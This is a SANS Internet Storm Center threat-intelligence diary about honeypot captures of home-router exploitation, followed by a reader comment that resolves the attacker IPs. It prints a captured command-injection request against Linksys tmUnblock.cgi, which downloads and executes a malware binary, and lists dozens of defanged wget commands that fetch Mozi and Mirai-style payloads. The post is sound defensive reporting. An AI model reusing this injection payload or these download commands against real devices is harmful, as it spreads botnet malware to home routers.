Scanning Home Internet Facing Devices to Exploit

Published: 2020-07-11
Last Updated: 2020-07-11 23:31:53 UTC
by Guy Bruneau (Version: 1)
2 comment(s)

In the past 45 days, I noticed a surge of activity in my honeypot logs for home router exploitation. This is a summary of the various hosts and IP addresses with potential exploit packages available for download. What is also interesting is the fact that most URL were only IP based, no hostname associated with them. Some of the URL were improperly configured, they still contained the default private IP and a few other contained: YOURIPHERE.

20200710-190150: 192.168.25.9:80-111.229.239.203:34654 data 'POST /tmUnblock.cgi HTTP/1.1\r\nHost: 93.114.82[.]154:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: python-requests/2.20.0\r\nContent-Length: 227\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nttcp_ip=-h `cd /tmp; rm -rf mpsl; wget http://YOURIPHERE/bins/mpsl; chmod 777 mpsl; ./mpsl linksys`&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1'

Indicators of Compromise

14 wget http://ardp.hldns[.]ru/EThHpW
6 wget http://178.33.64[.]107/arm7
5 wget http://164.132.92[.]168:6479/bins/viktor.mips
4 wget http://185.172.111[.]214/8UsA.sh
4 wget http://147.135.173[.]238/pulse
4 wget http://212.114.52[.]128/arm7
4 wget http://51.222.26[.]189/yakuza.mpsl
3 wget http://ardp.hldns[.]ru/loligang.EThHpW
2 wget http://194.15.36[.]96/bins/mpsl
2 wget http://37.49.224[.]253/bin
2 wget http://37.49.224[.]46/bins/mpsl
2 wget http://19ce033f.ngrok[.]io/arm7
2 wget http://96.30.193[.]26/arm7
2 wget http://80.82.70[.]140//ef59f34faec0514e8d96b40f72b355d99b91f45d5cd14dce39094dbcd8c4e002.mips
2 wget 192.154.229[.]223/beastmode/b3astmode.arm7
1 wget -g 37.49.226[.]16 -l /tmp/leooon -r /luoqxbocmkxnexy/tbox.mips
1 wget http://116.114.95[.]20:55639/Mozi.a
1 wget http://123.11.8[.]237:60403/Mozi
1 wget http://37.49.224[.]44/bins/mpsl
1 wget http://163.204.21[.]255:37827/Mozi.a
1 wget http://172.39.5[.]207:43229/Mozi.m
1 wget http://45.95.168[.]131/bins/mpsl
1 wget http://45.95.168[.]228/sn0rt.sh
1 wget http://45.84.196[.]58/bins/mpsl
1 wget http://45.84.196[.]135/bins/mpsl
1 wget http://49.89.231[.]228:57693/Mozi.m
1 wget http://172.45.61[.]7:35173/Mozi.a
1 wget http://192.3.45[.]185/arm7
1 wget http://irc.hoaxcalls[.]pw/sh
1 wget http://77.43.137[.]199:50375/Mozi.a
1 wget http://77.43.253[.]106:34278/Mozi.a
1 wget http://89.148.247[.]11:35039/Mozi.a
1 wget http://62.4.31[.]161/bins/mpsl
1 wget http://194.15.36[.]125/bins/mpsl
1 wget http://176.123.6[.]35/bins/mpsl
1 wget http://45.95.168[.]228/YaO2uFOvUG8LV1y5NY1aCHmr1WdBLjcjiVD6aRRAWDL6oNY29J88y0nrXxaHBmTLEYC9yB56gBn95pco8kCbldVsHmjNQk8JTaC/Meth.mpsl
1 wget http://23.95.89[.]71/bins/mpsl
1 wget http://159.89.182[.]124/ankit/jno.mpsl
1 wget http://209.141.37[.]101/bins/mpsl
1 wget http://107.174.206[.]110/bins/mpsl
1 wget http://23.95.89[.]71/bins/mpsl
1 wget http://94.102.54[.]78/bins/mpsl
1 wget 185.172.111[.]214/bins/UnHAnaAW.x86

Failed URL
12 wget http://192.168.1[.]1:8088/Mozi.m    <- Private IP
3 wget http://YOURIPHERE/bins/mpsl         <- Forgot to configured
2 wget http://192.168.1[.]1:8088/Mozi.a       <- Private IP

SH256 Hash
Mozi.m e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0

[1] https://isc.sans.edu/ipinfo.html?ip=93.114.82.154
[2] https://urlhaus.abuse.ch/url/399840/
[3] https://urlhaus.abuse.ch/url/332748/

-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

2 comment(s)

Comments

Every once in a while a diary makes me curious about something. So I ran frequencies and DNS for the "Indicators of Compromise" section (just the IPs). This output is ordered by frequency and then IP.

1 37.49.224[.]44
1 37.49.224[.]46 62.4.31.161
1 37.49.224[.]253
1 37.49.226[.]16
1 45.84.196[.]58
1 45.84.196[.]135
1 45.95.168[.]131 maxko-hosting.com
1 49.89.231[.]228
1 51.222.26[.]189 vps-ed17e7cd.vps.ovh.ca
1 62.4.31[.]161
1 77.43.137[.]199 homeuser77.43.137.199.ccl.perm.ru
1 77.43.253[.]106 homeuser77.43.253.106.ccl.perm.ru
1 80.82.70[.]140 no-reverse-dns-configured.com
1 89.148.247[.]11 homeuser247-11.ccl.perm.ru
1 94.102.54[.]78
1 96.30.193[.]26 96.30.193.26.vultr.com
1 107.174.206[.]110 107-174-206-110-host.colocrossing.com
1 116.114.95[.]20
1 123.11.8[.]237 hn.kd.ny.adsl
1 147.135.173[.]238 ip238.ip-147-135-173.eu
1 159.89.182[.]124
1 163.204.21[.]255
1 164.132.92[.]168
1 172.39.5[.]207
1 172.45.61[.]7
1 176.123.6[.]35 176-123-6-35.alexhost.md
1 178.33.64[.]107
1 192.3.45[.]185 192-3-45-185-host.colocrossing.com
1 192.154.229[.]223
1 194.15.36[.]96 sistemasmc.com
1 194.15.36[.]125 tech.saleeditor.com
1 209.141.37[.]101 server.vpfn.com
1 212.114.52[.]128
2 23.95.89[.]71 23-95-89-71-host.colocrossing.com
2 45.95.168[.]228 slot0.athakics.com
2 185.172.111[.]214

I found it curious that one IP appeared twice but was the same line in the "Indicators of Compromise" section. But what I found especially interesting is the DNS name for 37.49.224[.]46 -- (according to WHOIS) an NL IP that has for a DNS name an IP from FR! What's up with that? I also find curious the two naming conventions for the three .RU's.

I'm not saying any of this is really important, but since I made the observations I figured I may as well share.

P.S. How do you quote output from a program? The above listing was better-formatted during editing. I also don't know how to delete a post.

Diary Archives